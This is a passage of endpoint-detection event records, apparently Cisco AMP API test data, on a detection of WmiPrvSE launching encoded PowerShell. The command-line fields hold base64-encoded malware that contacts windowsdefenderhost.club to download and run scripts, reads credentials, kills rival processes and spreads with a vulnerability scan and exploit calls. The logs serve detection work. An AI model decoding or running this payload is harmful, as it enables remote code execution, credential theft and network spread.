bgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgAC